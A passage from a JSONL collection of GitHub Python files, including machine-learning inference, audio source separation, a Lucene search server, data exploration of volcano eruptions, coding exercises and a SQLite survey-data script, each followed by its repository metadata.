infinitas'''\n","repo_name":"ronibarylko/python_abm","sub_path":"src/BabySteps/4_conditionalEvolution.py","file_name":"4_conditionalEvolution.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9709530068","text":"# %%\nimport sys\nsys.path.append(\n '/home/houbowei/Artificial_intellectual_disabilities/image_caption')\nsys.path.append('~/cocoapi/PythonAPI')\nfrom model import EncoderCNN, DecoderRNN\n\nimport os\nimport torch\nfrom data_loader import get_loader\nfrom torchvision import transforms\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ntransform_test = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))\n])\n# %%\ndata_loader = get_loader(transform_test, mode='test',\n vocab_file='/home/houbowei/Artificial_intellectual_disabilities/image_caption/vocab.pkl')\norig_image, image = next(iter(data_loader))\nplt.imshow(np.squeeze(orig_image))\nplt.title('example image')\nplt.show()\n\n# %%\ndevice = torch.device('cuda:2' if torch.cuda.is_available() else 'cpu')\n\nencoder_file = './models/256-512-512-encoder-1.pkl'\ndecoder_file = './models/256-512-512-decoder-1.pkl'\n\nembed_size = 512\nhidden_size = 512\n\nvocab_size = len(data_loader.dataset.vocab)\n\nencoder = EncoderCNN(embed_size)\ndecoder = DecoderRNN(embed_size, hidden_size, vocab_size)\n\nencoder.eval()\ndecoder.eval()\n\nencoder.load_state_dict(torch.load(encoder_file))\ndecoder.load_state_dict(torch.load(decoder_file))\n\nencoder.to(device)\ndecoder.to(device)\n\n# Move image Pytorch Tensor to GPU if CUDA is available.\nimage = image.to(device)\n\n# Obtain the embedded image features.\nfeatures = encoder(image).unsqueeze(1)\n\n# Pass the embedded image features through the model to get a predicted caption.\noutput = decoder.sample(features)\nprint('example output:', output)\n\nassert (type(output) == list), \"Output needs to be a Python list\"\nassert all([type(x) == int for x in output]\n ), \"Output should be a list of integers.\"\nassert all([x in data_loader.dataset.vocab.idx2word for x in output]\n ), \"Each entry in the output needs to correspond to an integer that indicates a token in the vocabulary.\"\n","repo_name":"Bovey0809/Artificial_intellectual_disabilities","sub_path":"image_caption/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40958001148","text":"# Python object-Oriented Programming\n\n# Classes\n # Utilizadas para criar Objetos (instances)\n # Objetos são partes de dentro de uma Class (instancias)\n # Classes são utilizadas para agrupar dados e funções, podendo reutilizar\n # ====\n # Class: Frutas\n # Objects: Abacate, Banana...\n\nclass Funcionarios:\n nome = \"Seya\"\n constelacao = \"Pegasus\"\n data_nascimento = \"12/02/1990\"\n\nFuncionarios()\n\nusuario1 = Funcionarios()\nprint(usuario1.nome)\nprint(usuario1.constelacao)\nprint(usuario1.data_nascimento)","repo_name":"vinicioschiavo/Python-do-zero-ao-desenvolvimento","sub_path":"basico-de-python/78-criando-a-primeira-classe.py","file_name":"78-criando-a-primeira-classe.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30216680576","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ssp', '0003_proyecto'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='proyecto',\n name='aprovado',\n field=models.CharField(default=b'en proceso', max_length=44, choices=[(b'aprovado', b'aprovado'), (b'rechasado', b'rechasado'), (b'en proceso', b'en proceso')]),\n ),\n ]\n","repo_name":"jasielcalzada/Proyectos_ADAS","sub_path":"apps/ssp/migrations/0004_auto_20161125_2117.py","file_name":"0004_auto_20161125_2117.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27798066608","text":"class Solution:\n def canJump(self, nums: List[int]) -> bool:\n \n n = len(nums)\n \n max_idx = 0\n for i in range(n):\n if i > max_idx:\n return False\n max_idx = max(max_idx, i+nums[i])\n \n return True\n ","repo_name":"berthahsu-0217/leetcode-solutions","sub_path":"0055-jump-game/0055-jump-game.py","file_name":"0055-jump-game.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27683940598","text":"#%%\nimport os \nimport glob \nimport subprocess\nfrom pathlib import Path\n\nfrom pydub import AudioSegment\nimport tqdm\nimport shutil\n\ntarget_sr = 44100\n\n\ndef readSpath(txtpath):\n songpath_list = []\n with open(txtpath, 'r') as file:\n for line in file.readlines():\n songpath_list.append(line.strip('\\n'))\n return songpath_list\n\ndef mergingstems(stems4merge, NoDrum_spath):\n NoDrum_audio = AudioSegment.from_file(stems4merge[0]).set_frame_rate(target_sr).set_channels(1)\n for eachstem in stems4merge[1:]:\n new_stem = AudioSegment.from_file(eachstem).set_frame_rate(target_sr).set_channels(1)\n NoDrum_audio = NoDrum_audio.overlay(new_stem)\n NoDrum_audio.export(NoDrum_spath, format = 'wav')\n\ndef get_datasetSongs_NmergeNsave(datasetName , \n SourceSepAUG_dataset_dir ):\n songdir_list = glob.glob(os.path.join(SourceSepAUG_dataset_dir, datasetName, 'SpleeterSep_temp', \"*\"))\n for eachsong_path in tqdm.tqdm(songdir_list):\n# break\n #### glob all stems\n spleeter_wavs = glob.glob(os.path.join(eachsong_path, \"*.wav\"))\n #### separate pathlist for drum and nodrum\n drumstem_src = os.path.join(eachsong_path, \"drums.wav\")\n stems4merge = list(set(spleeter_wavs)-set([drumstem_src]))\n NoDrum_spath = eachsong_path.replace('SpleeterSep_temp', 'NoDrum')+\".wav\"\n if not os.path.exists(NoDrum_spath):\n mergingstems(stems4merge, NoDrum_spath)\n \n drumwav_spath = eachsong_path.replace('SpleeterSep_temp', 'OnlyDrum')+\".wav\"\n if not os.path.exists(drumwav_spath):\n drumaudio = AudioSegment.from_file(drumstem_src).set_frame_rate(target_sr).set_channels(1)\n drumaudio.export(drumwav_spath, format = 'wav')\n\ndef getAugpath(ori_songtxt, datasetname, augtype = 'NoDrum'):\n songlist = []\n with open(ori_songtxt, 'r') as file:\n for line in file.readlines():\n # break\n songlist.append(line.replace('/datasets/original', '/datasets/sourcesep_aug').replace(datasetname+'/audio', datasetname+'/'+augtype))\n return songlist\n\ndef savetxt(spath, songlist):\n with open(spath, 'w') as file:\n for song in songlist:\n file.write(song)\n \n \ndef main():\n \"\"\" \n glob all datasets in original, create audiofile.txt and perform source separation on all songs\n \"\"\"\n ori_dir = os.path.join('./', 'datasets/original/')\n ori_datasets = glob.glob(os.path.join( ori_dir, \"*\"))\n ssaug_dir = os.path.join('./', 'datasets/sourcesep_aug/')\n fail_list = []\n\n ### applying source separation on eachsong in each dataset\n for eachdataset in ori_datasets:\n audio_file_path = os.path.join(eachdataset, \"audio_files.txt\")\n ##### get all songs for the dataset #####\n song_path_list = readSpath(audio_file_path)\n\n ##### applying spleeter on each song #####\n for eachsong in song_path_list:\n out_dirname = os.path.join(ssaug_dir, os.path.basename(eachdataset),\n \"SpleeterSep_temp\")\n if not os.path.exists(out_dirname) :\n print(\"create folder:\", out_dirname)\n Path(out_dirname).mkdir(parents = True, exist_ok = True)\n print(\"Processing dataset:{}, song:{} \".format( eachdataset, Path(eachsong).stem))\n try:\n p = subprocess.Popen([\"spleeter\", \"separate\", \"-i\", str(eachsong), \"-p\", \"spleeter:4stems\", \"-o\", out_dirname ])\n p.communicate()\n except:\n fail_list.append([eachdataset, eachsong])\n \n errors_n = len(fail_list)\n print(\"======> finished processing with {} error songs========\".format(errors_n))\n if errors_n > 0:\n print(\"failed songs:\", fail_list)\n\n ### merging/organizing nondrum/drum stems for each dataset\n print(\"========> Merging Spleeter Stems ========\")\n SourceSepAUG_dataset_list = os.listdir(ssaug_dir)\n\n for eachdataset in SourceSepAUG_dataset_list:\n NoDrum_dir = os.path.join(ssaug_dir, eachdataset, \"NoDrum\")\n if not os.path.exists(NoDrum_dir):\n Path(NoDrum_dir).mkdir(parents = True, exist_ok= True)\n OnlyDrum_dir = os.path.join(ssaug_dir, eachdataset, \"OnlyDrum\")\n if not os.path.exists(OnlyDrum_dir):\n Path(OnlyDrum_dir).mkdir(parents = True, exist_ok = True)\n print(\"======= Processing {} Dataset =======\".format(eachdataset))\n get_datasetSongs_NmergeNsave(eachdataset , \n SourceSepAUG_dataset_dir = ssaug_dir)\n \n #### copy train-test-valid files to nodrum/drum folder\n #### copy downbeat annotation folders to aug folders\n downbeat_src = os.path.join(ori_dir, eachdataset, 'downbeats')\n print(\"=======> copying traintest split to aug folders...\")\n oritxts = [os.path.join(ori_dir, eachdataset , i) for i in ['audio_files.txt', 'train_audiofiles.txt', \n 'test_audiofiles.txt', 'valid_audiofiles.txt']]\n for oritxt in oritxts:\n # break\n for augtype in [\"NoDrum\", \"OnlyDrum\"]:\n # break\n augsonglist = getAugpath(oritxt, eachdataset, augtype)\n augspath = os.path.join(ssaug_dir, eachdataset, augtype, os.path.basename(oritxt))\n if not os.path.exists(augspath):\n savetxt(augspath, augsonglist)\n \n downbeat_dst = os.path.join(ssaug_dir, eachdataset, augtype, 'downbeats')\n if not os.path.exists(downbeat_dst):\n print(\"----> copying annotations to: \", downbeat_dst)\n shutil.copytree(downbeat_src, downbeat_dst)\n\nif __name__ ==\"__main__\":\n main()","repo_name":"SunnyCYC/aug4beat","sub_path":"source_seperation_aug4beat.py","file_name":"source_seperation_aug4beat.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} +{"seq_id":"3179579278","text":"import nextcord\nasync def remove(self, Inter, index: int):\n \"\"\" Removes an item from the player's queue with the given index. \"\"\"\n player = self.bot.lavalink.player_manager.get(Inter.guild.id)\n emed = nextcord.Embed(color=0xff470b)\n embed = nextcord.Embed(colour=0xff470b)\n if player is None:\n embed.title =f'ให้ฉันเข้าก่อนสิ'\n await Inter.send(embed=embed)\n return\n \n if not player.is_playing:\n emed.title = 'เฮ้นายน่ะยังไม่ได้เปิดเพลงเลยนะ'\n return await Inter.send(embed=emed)\n if await self.vote_(Inter):\n embed.title =f'ไม่เอิ้กๆ'\n await embed.send(embed=embed)\n return\n\n if index > len(player.queue) or index < 1:\n emed.title = f'> **กรุณเลือกเพลงระหว่าง **between** 1 - {len(player.queue)}**'\n return await Inter.send(embed=emed)\n\n removed = player.queue.pop(index - 1) # Account for 0-index.\n emed.title =f'> 🗑️ เพลง **{removed.title}** ได้ทำการถูกลบแล้ว'\n await Inter.send(embed=emed)","repo_name":"Ax-47/musik","sub_path":"src/commands/music_command/remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29366724019","text":"#Descomponer un número\nnumero=int(input('ingrese un numero: '))\n\nM = numero//1000\nnumero = numero-M*1000\nC = numero//100\nnumero =numero-C*100\nD = numero//10\nU = numero-D*10\n\na = str(M)+'M + '\nb = str(C)+'C + '\nc = str(D)+'D + '\nd = str(U)+'U'\nif M == 0:\n\ta = ''\n\n\nfinal = a+b+c+d\nprint(final)\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej8/hito1_ej8_5d4bd55f38c5fe5eb0487ca5bf491359.py","file_name":"hito1_ej8_5d4bd55f38c5fe5eb0487ca5bf491359.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12737595938","text":"# wavefns.py\n#By Tsering Tashi and Ryusei Mikami\n#(It has the information about various standard form of wave such as squarewave,\n#trianglewave, sawtoothwave, and whitenoise)\n\"\"\"Simple periodic waveform functions.\n\n A \"standard\" wave function (such as sin) is a periodic function with\n period equal to 2*pi (also known as tau) and a amplitude of 1.\n\"\"\"\nimport math\nimport random\n\ndef sinewave(t):\n \"\"\" Standard periodic sine wave generator\n pre: t >= 0\n post returns value of standard sine wave at time t\n (0 at t=0, 1 at t= pi/2, 0 at pi, -1 at 1.5*pi, 0 at 2*pi)\n \"\"\"\n\n return math.sin(t)\n\ndef squarewave(t):\n \"\"\" Standard periodic square wave generator.\n\n pre: t >= 0\n post: returns value of standard square wave at time t.\n (1.0 for 0 <= t < pi and -1.0 for pi <= t < 2*pi)\n \"\"\"\n phase = t % math.tau\n if phase < math.pi:\n return 1\n else:\n return -1\n\n\ndef trianglewave(t):\n \"\"\" Standard periodic triangle wave generator.\n\n pre: t >= 0\n post: returns value of standard triangle wave at time t.\n (0.0 at t=0, 1.0 at t=pi/2, 0.0 at t=pi, -1.0 at t=1.5*pi)\n \"\"\"\n phase = t%math.tau\n if 0 <= phase < math.pi / 2:\n return (0 + phase) * 2/math.pi\n elif math.pi / 2 <= phase < (3*math.pi) / 2:\n return 1 + (phase - math.pi/2) * -2/math.pi\n elif (3*math.pi) / 2 <= phase <= math.tau:\n return -1 + (phase - 1.5 * math.pi) * 2/math.pi\n \n \n\ndef sawtoothwave(t):\n \"\"\" Standard periodic sawtooth wave generator.\n\n pre: t >= 0\n post: returns value of standard sawtooth wave at time t.\n (0.0 at t=0, rising to 1 near t=pi, -1.0 at t=pi, rising to 0.0 at t=pi)\n \"\"\"\n phase = t % math.tau\n if 0 <= phase < math.pi:\n return 0 + (phase * 1 / math.pi)\n elif math.pi<= phase < 2*math.pi:\n return -1 + (phase - math.pi) * 1/math.pi \n\n\ndef whitenoise(t):\n \"\"\" White noise \"wave\" generator\n\n post: returns random float value in range -1 to 1\n \"\"\"\n \n return (2 * random.random()) - 1\n\n\n\n######################################################################\n# The rest of this is for testing purposes. No changes needed.\n# Requires: graphics needed to visualize the wave forms\n\ndef _plot(wavefn):\n # test function plots 2 cycles of wavefunction\n win = GraphWin(wavefn.__name__, 600, 200)\n win.setCoords(0, -1, 2*math.tau, 1)\n Line(Point(0, 0), Point(2*math.tau, 0)).draw(win)\n npoints = 300\n dt = 2*math.tau/npoints\n t = 0\n last = Point(t, wavefn(t))\n for i in range(npoints):\n t += dt\n p = Point(t, wavefn(t))\n segment = Line(last, p).draw(win)\n segment.setFill(\"red\")\n segment.setWidth(2)\n last = p\n win.getMouse()\n win.close()\n\n\nif __name__ == \"__main__\":\n from graphics import *\n for wf in [sinewave, squarewave, trianglewave, sawtoothwave, whitenoise]:\n _plot(wf)\n","repo_name":"TibetanPythoner/SoundWave","sub_path":"wavefns.py","file_name":"wavefns.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44682553744","text":"\"\"\"\nA nearest neighbor learning algorithm example using TensorFlow library.\nThis example is using the MNIST database of handwritten digits\n(http://yann.lecun.com/exdb/mnist/)\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nimport operator\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"../../mnist/MNIST-data/\", one_hot=True)\n\nXtr, Ytr = mnist.train.next_batch(5000)\nXte, Yte = mnist.test.next_batch(200)\n\nxtr = tf.placeholder(\"float\", [None, 784])\nxte = tf.placeholder(\"float\", [784])\n\ndistance = tf.reduce_sum(tf.abs(tf.add(xtr, tf.negative(xte))), reduction_indices=1)\nsortedDistIndices = tf.nn.top_k(-distance, k=3).indices\nminDistance = tf.gather(distance, sortedDistIndices)\n\n# K-means\nk_accuracy = 0.\nwith tf.Session() as sess:\n for i in range(len(Xte)):\n\n indices = sess.run(sortedDistIndices, feed_dict={xtr: Xtr, xte: Xte[i]})\n\n classCount = {}\n for index in range(len(indices)):\n # trueClass = np.argmax(Yte[i])\n predictionClass = np.argmax(Ytr[indices[index]])\n classCount[predictionClass] = classCount.get(predictionClass, 0) + 1\n print(\"Result\", index, \"Prediction:\", predictionClass,\n \"True Class:\", np.argmax(Yte[i]))\n\n pred = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)[0][0]\n if pred == np.argmax(Yte[i]):\n k_accuracy += 1. / len(Xte)\n\n print(\"Done!\")\n print(\"K_Accuracy:\", k_accuracy)\n\npred = tf.arg_min(distance, 0)\n\naccuracy = 0.\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n\n for i in range(len(Xte)):\n nn_index = sess.run(pred, feed_dict={xtr: Xtr, xte: Xte[i]})\n print(\"Test\", i, \"Prediction:\", np.argmax(Ytr[nn_index]),\n \"True Class:\", np.argmax(Yte[i]))\n if np.argmax(Ytr[nn_index]) == np.argmax(Yte[i]):\n accuracy += 1. / len(Xte)\n\n print(\"Done!\")\n print(\"Accuracy:\", accuracy)\n\nprint(\"Compare:\", \"k_accuracy\", k_accuracy, \"accuracy\", accuracy)\n","repo_name":"jinkg/NeuralNetworkdsAndDeepLearning","sub_path":"TensorflowStudy/TensorFlowExamples/2_BasicModels/nearest_neighbor.py","file_name":"nearest_neighbor.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"22343429913","text":"# Start to use pandas\nimport numpy as np\nfrom numpy.lib.function_base import append\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# Error meet when import matplotlib: ModuleNotFoundError: No module named 'matplotlib'\n# So I tried to install it, but got an error\n# Input: pip install matplotlib\n# Output: Requirement already satisfied: futures in /Users/Longfei/Library/Python/2.7/lib/python/site-packages (from tornado->matplotlib) (3.3.0)\n\ndef xaxis_generation():\n \"\"\"\n Generate the common used xaxis for the following three diagrams\n return: A list of year from 1700 to 2021\n rtype: List\n \"\"\"\n xaxis = []\n for i in range(1700, 2021):\n xaxis.append(i)\n return xaxis\n\n\ndef Number_Eruptions(df, xaxis):\n \"\"\"\n Show the trend of number of eruptions verus time\n param: df Dataframe the prepared data, xaxis used for plotting\n return: Line plot of number of eruptions over time\n rtype: Graph\n \"\"\"\n NumErup = []\n for i in xaxis:\n count = 0\n for x in df['Start Year']:\n if i == x:\n count = count + 1\n NumErup.append(count)\n\n plt.cla()\n plt.plot(xaxis, NumErup)\n plt.xlabel(\"Eruption Start Year\")\n plt.ylabel(\"Number of Eruptions\")\n plt.title(\"The relationship between Year and Number of Eruptions\")\n plt.savefig('images/Number of Eruptions over Year.png')\n\n\ndef Eruption_Duration(df, xaxis):\n \"\"\"\n Show the trend of eruptions duration verus time\n param: df Dataframe the prepared data, xaxis used for plotting\n return: Line plot of eruptions duration over time\n rtype: Graph\n \"\"\"\n ErupDur_with_Outliner = []\n ErupDur_without_Outliner = []\n for i in xaxis:\n dur_with_Outliner = []\n dur_without_Outliner = []\n row = 0\n for x in df['Start Year']:\n if i == x:\n day = df.loc[row, 'Eruption Duration (d)']\n if day < 10000:\n dur_with_Outliner.append(day)\n dur_without_Outliner.append(day)\n else:\n dur_with_Outliner.append(day)\n row = row + 1\n if sum(dur_with_Outliner) == 0:\n ErupDur_with_Outliner.append(0)\n else:\n ErupDur_with_Outliner.append(np.mean(dur_with_Outliner))\n if sum(dur_without_Outliner) == 0:\n ErupDur_without_Outliner.append(0)\n else:\n ErupDur_without_Outliner.append(np.mean(dur_without_Outliner))\n\n plt.cla()\n plt.plot(xaxis, ErupDur_with_Outliner)\n plt.xlabel(\"Eruption Start Year\")\n plt.ylabel(\"Eruption Durations (d)\")\n plt.title(\n \"The relationship between Year and Eruption Durations (with outliners)\")\n plt.savefig('images/Eruptions Durations over Year with outliners.png')\n\n plt.cla()\n plt.plot(xaxis, ErupDur_without_Outliner)\n plt.xlabel(\"Eruption Start Year\")\n plt.ylabel(\"Eruption Durations (d)\")\n plt.title(\n \"The relationship between Year and Eruption Durations (without outliners)\")\n plt.savefig('images/Eruptions Durations over Year without outliners.png')\n\n\ndef VEI(df, xaxis):\n \"\"\"\n Show the trend of volcano eruption index (VEI) verus time\n param: df Dataframe the prepared data, xaxis used for plotting\n return: Line plot of VEI over time\n rtype: Graph\n \"\"\"\n VEI = []\n for i in xaxis:\n index = []\n row = 0\n\n for x in df['Start Year']:\n if i == x:\n index.append(df.loc[row, 'Volcano Eruption Index (VEI)'])\n row = row + 1\n if sum(index) == 0:\n VEI.append(0)\n else:\n VEI.append(np.mean(index))\n\n plt.cla()\n plt.plot(xaxis, VEI)\n plt.xlabel(\"Eruption Start Year\")\n plt.ylabel(\"Volcano Eruption Index (VEI)\")\n plt.title(\"The relationship between Year and VEI\")\n plt.savefig('images/VEI over Year.png')\n\n\nif __name__ == '__main__':\n cleaned_file = \"Cleaned_GVP_Eruption_Results.xlsx\"\n df = pd.read_excel(cleaned_file)\n df.rename(columns={'Sta_yr': 'Start Year', 'Erup_dur': 'Eruption Duration (d)',\n 'VEI': 'Volcano Eruption Index (VEI)'}, inplace=True)\n # Basic stat\n print(df.describe())\n # Outliners\n df.plot.box(subplots=True)\n plt.show()\n # No need to drop, reasonable outliners\n print(df.loc[df['Eruption Duration (d)'] > 10000])\n # Plot graph to anwer the three questions\n Year = xaxis_generation()\n Number_Eruptions(df, Year)\n Eruption_Duration(df, Year)\n VEI(df, Year)\n","repo_name":"Longfei-CLF/coursework-1-Longfei-CLF","sub_path":"data_exploration.py","file_name":"data_exploration.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27648206712","text":"class Parks():\n \"\"\"Defining the parks class\"\"\"\n def __init__(self, id, name, history, city, state, longitude, latitude):\n self.id = id\n self.name = name\n self.history = history\n self.city = city\n self.state = state\n self.longitude = longitude\n self.latitude = latitude\n","repo_name":"nss-day-cohort-60/national-parks-api","sub_path":"models/parks.py","file_name":"parks.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"9753385142","text":"from db import MysqlClient\r\nfrom indexer import Indexer\r\nfrom server import MyWebServer\r\nimport lucene\r\nfrom org.apache.lucene.store import NIOFSDirectory\r\nfrom org.apache.lucene.index import DirectoryReader\r\nfrom http.server import HTTPServer\r\nimport time, os, _thread\r\nfrom java.nio.file import Paths\r\nfrom utils import INTERVAL\r\n\r\nhostName = \"0.0.0.0\"\r\nserverPort = 8080\r\nINDEXDIR = os.environ.get('INDEXDIR') if os.environ.get(\r\n 'INDEXDIR') else \"./index\"\r\nSHOULD_SERVE = True\r\n\r\ndef indexing_and_update():\r\n vm_env = lucene.getVMEnv()\r\n vm_env.attachCurrentThread()\r\n directory = NIOFSDirectory(Paths.get(INDEXDIR))\r\n my_directory_reader = DirectoryReader.open(directory)\r\n while True:\r\n db = MysqlClient()\r\n db.take_and_index()\r\n db.close()\r\n del db\r\n my_new_directory_reader = DirectoryReader.openIfChanged(my_directory_reader)\r\n if my_new_directory_reader: # 有更新\r\n my_directory_reader = my_new_directory_reader\r\n MyWebServer.change_retriever(my_directory_reader)\r\n time.sleep(INTERVAL)\r\n\r\n\r\ndef start_serve(webServer):\r\n try:\r\n webServer.serve_forever()\r\n except KeyboardInterrupt:\r\n pass\r\n webServer.server_close()\r\n print(\"Server stopped.\")\r\n\r\nif __name__ == \"__main__\":\r\n # start JVM\r\n if not lucene.getVMEnv():\r\n lucene.initVM()\r\n print(\"started VM\")\r\n\r\n # indexing & initialize server\r\n _thread.start_new_thread(indexing_and_update,())\r\n webServer = HTTPServer((hostName, serverPort), MyWebServer)\r\n print(\"Server created http://%s:%s\" % (hostName, serverPort))\r\n \r\n start_serve(webServer)\r\n","repo_name":"fj4444/pylucene-of-C00kie","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72585014970","text":"ben_matrix = []\nfor i in range(3):\n #append an empty list\n ben_matrix.append([])\n\n #populate the empty list\n for j in range(6):\n ben_matrix[i].append(j)\n\nprint(ben_matrix)\n\n#another version using nested list comprehension\nsteve_matrix = [[j for j in range(6)] for i in range(3)]\nprint(steve_matrix)\n","repo_name":"bendeleon1226/DailyPython","sub_path":"022_nested_list_comprehension.py","file_name":"022_nested_list_comprehension.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69839634809","text":"import sqlite3\n\nfrom flask import Flask, render_template\nfrom csv import reader\n\nimport util\n\napp = Flask(__name__)\n\ndb = sqlite3.connect('hw5.db')\n\ndb.execute('''DROP TABLE MODEL''')\n\n\ndb.execute('''CREATE TABLE MODEL(\n [index] Integer PRIMARY KEY,\n [What country do you live in?] text,\n [How old are you?] Integer,\n [What is your gender?] text,\n [To what extent do you feel FEAR due to the coronavirus?] text,\n [To what extent do you feel ANXIOUS due to the coronavirus?] text,\n [To what extent do you feel ANGRY due to the coronavirus?] text,\n [To what extent do you feel HAPPY due to the coronavirus?] text,\n [To what extent do you feel SAD due to the coronavirus?] text,\n [Which emotion is having the biggest impact on you?] text, \n [What makes you feel that way?] text,\n [What brings you the most meaning during the coronavirus outbreak?] text,\n [What is your occupation?] text)''')\n\nwith open('t.csv', 'r') as read_obj:\n csv_reader = reader(read_obj)\n next(csv_reader)\n for row in csv_reader:\n item = row[0]\n item2 = row[1]\n item3 = row[2]\n item4 = row[3]\n item5 = row[4]\n item6 = row[5]\n item7 = row[6]\n item8 = row[7]\n item9 = row[8].decode('utf-8')\n item10 = row[9].decode('utf-8')\n item11 = row[10].decode('utf-8')\n item12 = row[11].decode('utf-8')\n item13 = row[12].decode('utf-8')\n db.execute('''INSERT INTO MODEL('index', 'What country do you live in?', 'How old are you?', 'What is your gender?', 'To what extent do you feel FEAR due to the coronavirus?', 'To what extent do you feel ANXIOUS due to the coronavirus?', 'To what extent do you feel ANGRY due to the coronavirus?', 'To what extent do you feel HAPPY due to the coronavirus?', 'To what extent do you feel SAD due to the coronavirus?', 'Which emotion is having the biggest impact on you?', 'What makes you feel that way?', 'What brings you the most meaning during the coronavirus outbreak?', 'What is your occupation?')\n VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)''',\n (item, item2, item3, item4, item5, item6, item7, item8, item9, item10, item11, item12, item13))\n db.commit()\n\n\ndatabaseList = list()\n\n\ndef storedatabase(db):\n cursorDB = db.cursor()\n cursorDB.execute('''SELECT * FROM MODEL''')\n rows = cursorDB.fetchall()\n\n for row in rows:\n databaseList.append(row)\n\n\nstep1group1List = list()\n\n\ndef step1group1(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Male' AND \"How old are you?\" <= 35''')\n rows = cursor1.fetchall()\n\n for row in rows:\n step1group1List.append(row)\n\n\nstep1group2List = list()\n\n\ndef step1group2(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Male' AND \"How old are you?\" >= 36''')\n rows = cursor1.fetchall()\n\n for row in rows:\n step1group2List.append(row)\n\n\ndef step1group3(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Female' AND \"How old are you?\" <= 35''')\n rows = cursor1.fetchall()\n\n for row in rows:\n print(row)\n\n\ndef step1group4(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Female' AND \"How old are you?\" >= 36''')\n rows = cursor1.fetchall()\n\n for row in rows:\n print(row)\n\n\ncountryList = [\"USA\", \"Switzerland\", \"Romania\", \"UK\", \"Hong Kong\", \"Columbia\", \"Canada\", \"Australia\", \"France\",\n \"Germany\", \"Cyprus\", \"Rwanda\", \"Israel\", \"Portugal\", \"Ireland\", \"New Zealand\", \"China\", \"Palestine\",\n \"Spain\"]\nlistOfList = list()\nlistOfList2 = list()\nlistOfList3 = list()\nlistOfList4 = list()\n\n\ndef step2group1(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Male' AND \"How old are you?\" <= 35''')\n rows = cursor1.fetchall()\n\n for country in countryList:\n\n print(country + \" Table\")\n emptyList = list()\n for row in rows:\n if row[1] in country:\n emptyList.append(row)\n\n for x in emptyList:\n print(x)\n\n print()\n\n listOfList.append(emptyList)\n\n\ndef step2group2(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Male' AND \"How old are you?\" >= 36''')\n rows = cursor1.fetchall()\n\n for country in countryList:\n\n print(country + \" Table\")\n emptyList = list()\n for row in rows:\n if row[1] in country:\n emptyList.append(row)\n\n for x in emptyList:\n print(x)\n\n print()\n\n listOfList2.append(emptyList)\n\n\ndef step2group3(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Female' AND \"How old are you?\" <= 35''')\n rows = cursor1.fetchall()\n\n for country in countryList:\n\n print(country + \" Table\")\n emptyList = list()\n for row in rows:\n if row[1] in country:\n emptyList.append(row)\n\n for x in emptyList:\n print(x)\n\n print()\n\n listOfList3.append(emptyList)\n\n\ndef step2group4(db):\n cursor1 = db.cursor()\n cursor1.execute('''SELECT * FROM MODEL WHERE \"What is your gender?\" LIKE 'Female' AND \"How old are you?\" >= 36''')\n rows = cursor1.fetchall()\n\n for country in countryList:\n\n print(country + \" Table\")\n emptyList = list()\n 